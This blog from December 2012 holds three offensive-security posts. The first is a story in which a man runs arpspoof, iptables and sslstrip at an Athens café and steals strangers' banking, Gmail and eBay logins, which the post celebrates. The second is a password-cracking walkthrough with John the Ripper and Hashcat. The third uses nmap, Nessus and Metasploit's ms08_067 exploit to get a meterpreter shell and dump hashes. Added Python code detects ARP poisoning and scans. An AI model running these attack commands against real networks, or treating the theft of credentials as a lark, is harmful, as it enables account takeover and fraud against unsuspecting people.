Wednesday, December 26, 2012

"And a happy new (F)ear!" ...SslStrip said!

Hello,
          Merry Christmas everyone! Today, 26/12/12, I will tell you a story which Mr. F told me yesterday. Actually, it's a horror story, one in which none of us would like to be the protagonist!

 Sit comfortably and pay attention.

"Mr. F was on holidays (since 23/12/12) and he wanted to go out for a coffee. He took his netbook's case, put on a pair of jeans, and an hour later he was drinking a coffee at Syntagma square (Attiki - Syntagma, Athens). While he was listening to the well-known horrible music of the coffee shop, he decided to turn on his Asus netbook and perform a simple port scan with his favorite port scanner, Nmap. At first he didn't notice anything, but after a while a huge list of available hosts was displayed on his 10.1-inch screen. 'Wow', he said! 'It's my lucky day.' After that, a crazy idea crossed Mr. F's mind. He called John, his best friend, to ask him to send Sslstrip via Dropbox. I'm sure everyone knows what Mr. F will attempt to do. While he was waiting for Sslstrip, he continued drinking his coffee and relaxing. Then he pressed 'F5' on his Dropbox account, and he suddenly saw a new folder named 'Sslstrip 0.9' with a tar.gz file inside. He extracted it, checked that everything worked, and started thinking.

He didn't type anything for 2 minutes. He was thinking: what must I do now? The final thought was to enable IP forwarding with the following command: $echo '1' > /proc/sys/net/ipv4/ip_forward . And that's what he entered. Then he checked that ip_forward was '1' instead of '0'. 'Everything is ok', he thought. After a while, he typed the 2nd command: $iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 . 'With the above command, I will redirect requests from port 80 to port 8080, and the connections will still reach their correct destination port.' After that, he was ready to type the 3rd command!

That was $arpspoof -i wlan0 -t 192.168.1.7 192.168.1.1 . With the above command he would be able to perform an ARP MITM attack between the target (192.168.1.7) and the host (192.168.1.1). - You can easily notice that he didn't use broadcast arpspoof. The reason is that he actually tried it, but the network was crashing! - 'Perfect!' he said, while he was watching the network traffic!

Read more : http://vishnuvalentino.com/hacking-tutorial/break-ssl-protection-using-sslstrip-and-backtrac

'I am ready', he said. 'I am ready to proceed to the final step!' Can you guess the final step? He only had to make Sslstrip listen on port 8080. 'Very easy', he said. 'I only have to type: $ python sslstrip.py -l 8080 and then I will wait as long as I need.'
He entered the command, drank his water (he had already finished his coffee) and waited for the magic moment!
  

He made some calls, browsed Facebook, played some mobile games, and after 20 minutes he decided to stop sslstrip and browse the .log file. The results were awesome. Banking, Facebook, eBay, Gmail and Hotmail accounts had been logged into the Sslstrip log file! He was able to access any of those accounts. He was ready to buy products, browse emails, transfer money and other things!
Ebay account example


After he finished with that, he closed his netbook, paid the waiter and left the coffee shop singing 'I wish you a Merry Christmas, I wish you a Merry Christmas ... and a Happy New (F)ear!!!'

Are you still here? Do you still feel safe with https? Mr. F hopes so. ;)
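Here is the other side of the story, as an added example that is not part of the original post: a small Python check a defender can run on a Linux client to notice the ARP poisoning that Mr. F's arpspoof command causes. It reads a table in the format of /proc/net/arp and reports two symptoms: the gateway resolving to a MAC other than the one pinned for it, and one MAC claiming several IP addresses. The sample table, the gateway address and the pinned MAC are constructed values; on a real host you would feed it the contents of /proc/net/arp.

```python
# Added example (not from the original post): a defender-side check for the
# ARP man-in-the-middle the story relies on. It reads a table in the format of
# Linux's /proc/net/arp and flags two symptoms of a poisoned cache: the gateway
# resolving to a MAC other than the one pinned for it, and one MAC claiming
# several IP addresses. The table and the pinned MAC are constructed sample data.
from collections import defaultdict

# Constructed sample in /proc/net/arp format (not captured from a real host).
# The gateway 192.168.1.1 and 192.168.1.20 both resolve to the same MAC.
SAMPLE_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:00:00:99     *        wlan0
192.168.1.7      0x1         0x2         aa:bb:cc:00:00:07     *        wlan0
192.168.1.20     0x1         0x2         aa:bb:cc:00:00:99     *        wlan0
192.168.1.30     0x1         0x0         00:00:00:00:00:00     *        wlan0
"""

# Hypothetical pinned value: the MAC the gateway is known to have.
PINNED = {"192.168.1.1": "aa:bb:cc:00:00:01"}

ATF_COM = 0x2   # flag bit set on complete (resolved) entries


def parse_arp_table(text):
    """Return {ip: mac} for complete entries of a /proc/net/arp style table."""
    entries = {}
    for line in text.splitlines()[1:]:        # first line is the header
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], int(fields[2], 16), fields[3].lower()
        if flags & ATF_COM:
            entries[ip] = mac
    return entries


def find_arp_anomalies(entries, pinned):
    """Return a list of human-readable alerts; empty when the table looks clean."""
    alerts = []
    # 1) a pinned address (the gateway) now resolving to a different MAC
    for ip, expected in pinned.items():
        seen = entries.get(ip)
        if seen is not None and seen != expected.lower():
            alerts.append(f"{ip} resolves to {seen}, pinned MAC is {expected}")
    # 2) one MAC answering for several IP addresses
    ips_by_mac = defaultdict(list)
    for ip, mac in entries.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"{mac} claims several IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_TABLE)
    for alert in find_arp_anomalies(table, PINNED) or ["ARP table looks clean"]:
        print(alert)
```

Both rules fire on the sample table: the gateway's MAC has changed, and that MAC also answers for a second address. Pinning the gateway's MAC is the part that needs a one-time lookup on a known-good network; the duplicate-MAC rule works without any prior knowledge.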

Thanks,
              Nikos Danopoulos

Sunday, December 23, 2012

Password Cracking : John The Ripper & Hashcat!


Hello everyone,

                             Today, I'm gonna show you how to crack MD4, MD5, SHA1, and other hash types by using John The Ripper and Hashcat.

John The Ripper: "John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version."

Source: http://www.openwall.com/john/ 

Hashcat: "Hashcat is the world’s fastest CPU-based password recovery tool.
While it's not as fast as its GPU counterparts oclHashcat-plus and oclHashcat-lite, large lists can be easily split in half with a good dictionary and a bit of knowledge of the command switches."

Source: http://hashcat.net/wiki/doku.php?id=hashcat

Download John The Ripper (Jumbo 1.7.9): John The Ripper Jumbo 1.7.9
Download Hashcat (0.41): Hashcat v0.41

Install both John and Hashcat and we are ready to start.
It's time to launch them. Go to John's run folder (JohnTheRipper-unstable-jumbo/run/) and type $./john to launch John.

Requirements for cracking a password with John: a wordlist and the password hash.

Here is a site where you can convert a word into an MD5 hash.
In the following list you can find some great wordlists. (I suggest you use an English dictionary as your wordlist.)

ftp://ftp.cerias.purdue.edu/pub/dict/wordlists/
ftp://ftp.openwall.com/pub/wordlists/
http://www.skullsecurity.org/wiki/index.php/Passwords

Now, it's time to try cracking passwords with John. We will use these password hashes:

 b326b5062b2f0e69046810717534cb09
 d41134fbdb1aacda7ccdb49ed3d33948
 37b4e2d82900d5e94b8da524fbeb33c0
 4ed5d2eaed1a1fadcc41ad1d58ed603e
 e09491aee3bd9ec02e805ffdac0beb12

Create a test.txt file and insert the above hashes. We also know that the passwords were hashed with MD5.
So we have a test.txt file with the hashes, and we know that the hashes are in MD5 format!

1st CHALLENGE:

$./john --format=raw-md5 --single test.txt

--format=raw-md5 is the format/type of the hash (MD5 in this case)
--single is John's single-crack mode, which tries to crack passwords quickly without using our wordlist



RESULT: 

 Loaded 5 password hashes with no different salts (Raw MD5 [128/128 SSE2 intrinsics 12x])


SCORE: Passwords 1 - 0 John

2nd CHALLENGE:

$./john --format=raw-md5 --wordlist=word_list_file.txt test.txt  

--wordlist=word_list_file.txt is the option with which we select our wordlist (replace "word_list_file.txt" with your wordlist's name)

RESULT: 

Loaded 5 password hashes with no different salts (Raw MD5 [128/128 SSE2 intrinsics 12x])
city             (4)
scary            (2)
observation    (5) 
true             (1)
football         (3)

 



SCORE: Passwords 1 - 1 John the Ripper!

If you wish to see your cracked hashes you can type:
$./john --show --format=raw-md5 test.txt 

What about cracking some SHA-1 hashes? For SHA-1 I will use the following hashes:

52c281dfd1301b71d268ecc736ee500502a2be87
14012cd1b375ede06f6334b34167397cb7be4265
0d612c12d2ac33625bf3e0351b6f5e4f73829fa8
8eec7bc461808e0b8a28783d0bec1a3a22eb0821
b363713a938afcd3c74603827fab79e935b2b09b 

 3rd CHALLENGE:

$./john --format=raw-sha1 --wordlist=wordlist_file.txt test.txt

--format=raw-sha1 sets the hash type to SHA-1

Loaded 5 password hashes with no different salts (Raw SHA-1 [128/128 SSE2 4x])
auto             (?)
reincarnation    (?)
manual           (?)
respect          (?)
security         (?) 




SCORE:  Passwords 1 - 2 John The Ripper



Ok, now it's time to crack some passwords with Hashcat. We will use the same hashes with those we used before.

 b326b5062b2f0e69046810717534cb09
 d41134fbdb1aacda7ccdb49ed3d33948
 37b4e2d82900d5e94b8da524fbeb33c0
 4ed5d2eaed1a1fadcc41ad1d58ed603e
 e09491aee3bd9ec02e805ffdac0beb12

1st CHALLENGE:

$./hashcat-cli32.bin 'test.txt' 'wordlistfile.txt' 

'test.txt' is the file which contains the hashes
'wordlistfile.txt' is the wordlist

 RESULT:

Added hashes from file test.txt: 5 (1 salts)

NOTE: press enter for status-screen

e09491aee3bd9ec02e805ffdac0beb12:observation
4ed5d2eaed1a1fadcc41ad1d58ed603e:city
b326b5062b2f0e69046810717534cb09:true
37b4e2d82900d5e94b8da524fbeb33c0:football
d41134fbdb1aacda7ccdb49ed3d33948:scary


All hashes have been recovered




SCORE: Passwords 0 - 1 Hashcat

2nd CHALLENGE:

$./hashcat-cli32.bin -m0 'test.txt' 'wordlistfile.txt' 

-m0 is the format type of the hash. -m means that we want to crack a specific type of hash, and 0 means that the hash type is MD5.

RESULT:


Added hashes from file test.txt: 5 (1 salts)

NOTE: press enter for status-screen

e09491aee3bd9ec02e805ffdac0beb12:observation
4ed5d2eaed1a1fadcc41ad1d58ed603e:city
b326b5062b2f0e69046810717534cb09:true
37b4e2d82900d5e94b8da524fbeb33c0:football
d41134fbdb1aacda7ccdb49ed3d33948:scary
All hashes have been recovered

 


SCORE: Passwords 0 - 2 Hashcat   


3rd CHALLENGE:

In this challenge we will crack SHA-1 hashes. We will use the same hashes as before.


52c281dfd1301b71d268ecc736ee500502a2be87
14012cd1b375ede06f6334b34167397cb7be4265
0d612c12d2ac33625bf3e0351b6f5e4f73829fa8
8eec7bc461808e0b8a28783d0bec1a3a22eb0821
b363713a938afcd3c74603827fab79e935b2b09b 

$./hashcat-cli32.bin -m100 'test.txt' 'wordlistfile.txt'

-m100 means that we want to crack SHA-1 hashes (hash mode 100 = SHA-1).

RESULT:

14012cd1b375ede06f6334b34167397cb7be4265:respect
0d612c12d2ac33625bf3e0351b6f5e4f73829fa8:auto
8eec7bc461808e0b8a28783d0bec1a3a22eb0821:security
52c281dfd1301b71d268ecc736ee500502a2be87:reincarnation
All hashes have been recovered



 
SCORE: Passwords 0 - 3 Hashcat


 Many people believe that Hashcat is faster and simpler. And that's true! After the above results, what's your opinion?
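To make the mechanics of the --wordlist and -m0 / -m100 runs above visible, here is an added example in Python; it is not part of the original post and is not John's or hashcat's own code. It runs the same dictionary attack against the hashes quoted above using a constructed mini wordlist (the recovered words plus a few decoys), and then runs it against salted digests to show why the attack becomes one full wordlist pass per hash once a salt is present. The wordlist, the salted records and the 8-byte random salt are assumptions for the demo.

```python
# Added example (not from the post, and not John's or hashcat's own code): the
# dictionary attack that both --wordlist runs above performed, written out so
# the mechanics are visible. Raw (unsalted) MD5 and SHA-1 of a dictionary word
# fall to a single pass over the wordlist; the salted variant at the end shows
# why the same attack costs one full pass per hash once salts are present.
import hashlib
import os

# Hashes quoted in the post above.
MD5_HASHES = [
    "b326b5062b2f0e69046810717534cb09",
    "d41134fbdb1aacda7ccdb49ed3d33948",
    "37b4e2d82900d5e94b8da524fbeb33c0",
    "4ed5d2eaed1a1fadcc41ad1d58ed603e",
    "e09491aee3bd9ec02e805ffdac0beb12",
]
SHA1_HASHES = [
    "52c281dfd1301b71d268ecc736ee500502a2be87",
    "14012cd1b375ede06f6334b34167397cb7be4265",
    "0d612c12d2ac33625bf3e0351b6f5e4f73829fa8",
    "8eec7bc461808e0b8a28783d0bec1a3a22eb0821",
    "b363713a938afcd3c74603827fab79e935b2b09b",
]

# Constructed mini wordlist: the words the tools recovered above, plus decoys.
WORDLIST = ["password", "city", "scary", "observation", "true", "football",
            "auto", "reincarnation", "manual", "respect", "security", "letmein"]


def guess_algorithm(hexdigest):
    """Pick the hash type from the digest length (what --format / -m state by hand)."""
    return {32: "md5", 40: "sha1"}.get(len(hexdigest))


def crack(hashes, wordlist, algorithm=None):
    """Return {hexdigest: word} for every target whose preimage is in wordlist.

    Unsalted hashes let one pass serve every target: each candidate word is
    hashed once and the digest is looked up against the whole target set.
    """
    targets = {h.strip().lower() for h in hashes}
    algorithm = algorithm or guess_algorithm(next(iter(targets)))
    found = {}
    for word in wordlist:
        digest = hashlib.new(algorithm, word.encode()).hexdigest()
        if digest in targets:
            found[digest] = word
    return found


def make_salted_records(words, algorithm="sha1"):
    """Constructed sample: each word stored as (salt_hex, H(salt || word))."""
    records = []
    for word in words:
        salt = os.urandom(8)    # 8 random bytes per record (demo choice)
        digest = hashlib.new(algorithm, salt + word.encode()).hexdigest()
        records.append((salt.hex(), digest))
    return records


def crack_salted(records, wordlist, algorithm="sha1"):
    """Same attack against salted digests; returns ({hexdigest: word}, hash ops).

    With a distinct salt per record the whole wordlist has to be re-hashed for
    every record, so the work is len(records) * len(wordlist) instead of
    len(wordlist) for the unsalted case.
    """
    found, attempts = {}, 0
    for salt_hex, digest in records:
        salt = bytes.fromhex(salt_hex)
        for word in wordlist:
            attempts += 1
            if hashlib.new(algorithm, salt + word.encode()).hexdigest() == digest:
                found[digest] = word
    return found, attempts


if __name__ == "__main__":
    for name, hashes in (("MD5", MD5_HASHES), ("SHA-1", SHA1_HASHES)):
        for digest, word in crack(hashes, WORDLIST).items():
            print(f"{name} {digest}:{word}")
    records = make_salted_records(["city", "scary", "football"])
    found, attempts = crack_salted(records, WORDLIST)
    print(f"salted: {len(found)} recovered after {attempts} hash operations")
```

The unsalted run hashes each word once for all five targets, which is exactly why a shared wordlist (or a precomputed table) is so effective against raw MD5 and SHA-1; the salted run has to repeat the whole wordlist for every record, and a slow, purpose-built password hash would multiply that cost again.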


Thanks,
               Nikos Danopoulos
 
 


Tuesday, December 4, 2012

Identify, scan & exploit a Windows system

Hello everyone,

    The following tutorial is based on a realistic scenario, and I'm gonna show you how to identify, scan and exploit a Windows XP OS.
    The victim is running Windows XP and the attacker Linux Mint (Maya 13).
   
    So, the first step is to identify the live hosts on the target network. A live host is a host which responds to an ICMP echo request (ping). For further information about ICMP, have a look here ( http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol ).
   
     Let's say that the network's IP range is 10.50.97.0/24. Now, to find the live hosts you have to launch nmap ( http://nmap.org/ ) and perform a ping scan by typing the following command:
   
    $ sudo nmap -v 10.50.97.0/24 

  The output should be something like this:
   


   

    The above command will start Nmap and perform a ping and port scan of every host from 10.50.97.0 to 10.50.97.255. If you want to perform only a ping scan, just replace -v with -sn.

   
    After finding the live hosts we have to identify their operating systems. To do this, just type:

$ sudo nmap -O [alive host's ip]
   
    With the above command you ask for operating system detection (-O). My output looks like this:

  
     After a quick check of the output we can easily learn the target's OS.
   
    After identifying the host we have to scan it for open ports, services and vulnerabilities. You can check for open ports and services by typing:

$ sudo nmap -sV [target's ip]

    The above command probes open ports to determine service information.
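From the defender's side, the two nmap steps above leave a clear footprint: one source touching many hosts in a short time (host discovery), or many ports on one host (service scan). The following is an added example, not part of the original tutorial, that flags both patterns over constructed connection records; the "epoch src dst proto dport" log format, the thresholds and the window length are assumptions, not values from the page.

```python
# Added example (not from the original tutorial): flag host-discovery sweeps
# and per-host port scans, the footprint of the nmap steps above, over
# constructed connection records. Format "epoch src dst proto dport" (dport is
# '-' for ICMP), thresholds and window length are all assumptions.
from collections import defaultdict

SWEEP_HOSTS = 20   # distinct destination hosts from one source within WINDOW
SCAN_PORTS = 15    # distinct destination ports on one host within WINDOW
WINDOW = 60        # seconds

# Constructed sample log (not a real capture): 10.50.97.5 pings 30 hosts, then
# probes 16 ports on 10.50.97.42; 10.50.97.9 just talks SMB to 10.50.97.42 twice.
PROBED_PORTS = [21, 22, 23, 25, 80, 135, 139, 443, 445, 1025,
                3389, 8080, 8443, 5900, 5800, 1433]
SAMPLE_LOG = "\n".join(
    [f"{1000 + i} 10.50.97.5 10.50.97.{i} icmp -" for i in range(1, 31)]
    + [f"{1100 + i} 10.50.97.5 10.50.97.42 tcp {p}" for i, p in enumerate(PROBED_PORTS)]
    + ["1200 10.50.97.9 10.50.97.42 tcp 445", "1201 10.50.97.9 10.50.97.42 tcp 445"]
)


def parse_log(text):
    """Parse lines into (ts, src, dst, proto, dport), with dport None for ICMP."""
    records = []
    for line in text.splitlines():
        ts, src, dst, proto, dport = line.split()
        records.append((int(ts), src, dst, proto, None if dport == "-" else int(dport)))
    return records


def detect_scans(records):
    """Return {(src, kind): count} for sources exceeding a threshold in a window.

    Every record's timestamp opens a window of WINDOW seconds; within it we
    count distinct destination hosts (sweep) and distinct ports per host
    (port scan). The first window that trips a rule records its count.
    """
    alerts = {}
    by_src = defaultdict(list)
    for rec in sorted(records, key=lambda r: r[0]):
        by_src[rec[1]].append(rec)
    for src, recs in by_src.items():
        for i, first in enumerate(recs):
            window = [r for r in recs[i:] if r[0] - first[0] <= WINDOW]
            hosts = {r[2] for r in window}
            if len(hosts) >= SWEEP_HOSTS:
                alerts.setdefault((src, "host-sweep"), len(hosts))
            ports_by_host = defaultdict(set)
            for r in window:
                if r[4] is not None:
                    ports_by_host[r[2]].add(r[4])
            for dst, ports in ports_by_host.items():
                if len(ports) >= SCAN_PORTS:
                    alerts.setdefault((src, f"port-scan:{dst}"), len(ports))
    return alerts


if __name__ == "__main__":
    for (src, kind), count in sorted(detect_scans(parse_log(SAMPLE_LOG)).items()):
        print(f"ALERT {src} {kind} ({count})")
```

On the sample data the scanning source trips both rules while the host that only opens two SMB connections stays silent. The thresholds are the part to tune: a /24 sweep like the one above touches far more than 20 hosts in a minute, but a busy monitoring server may legitimately do the same, so an allowlist of known scanners usually sits in front of rules like these.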
   
   
   
   Now, after gathering useful information we are gonna perform a vulnerability scan to identify open ports, more information and common vulnerabilities which we are gonna try to exploit later.
  
   To do this, we have to launch a vulnerability scan with the Nessus tool.
  
   Wait a couple of minutes. After the vulnerability scan has completed, check the report.
  
  
  OK! Here is the information we have:

  1) Vulnerable host's IP
  2) Target's operating system
  3) Service information
  4) Open ports, other information, vulnerabilities
 
  The next step, is to run the Metasploit Framework. With Metasploit we will exploit the vulnerabilities of the target.
  So, after launching Metasploit we should select the exploit we need. (Check your Nessus report to find the exploit name.) In this case, I'm gonna use the "ms08_067" exploit. To do this, type at the Metasploit prompt:

  "use exploit/windows/smb/ms08_067_netapi"
 
  'use' is the command which tells Metasploit which exploit to use.
 
  Now, type "show options" to see your exploit's options. Fill in the empty fields, such as "RHOST", "RPORT" etc., like the following example:


After completing the above step it's time to run our exploit. To do this, just type "exploit" and wait for the exploit to run.
 
  The following picture is an example of my metasploit session.

 
 

 
  Once a meterpreter session is opened you can easily take screenshots of the target machine by typing
  "screenshot", dump password hashes by typing "hashdump", and do other cool things!
                                                                     
 
  Have your coffee and enjoy your meterpreter session!
 
  Thanks,
      Nikos Danopoulos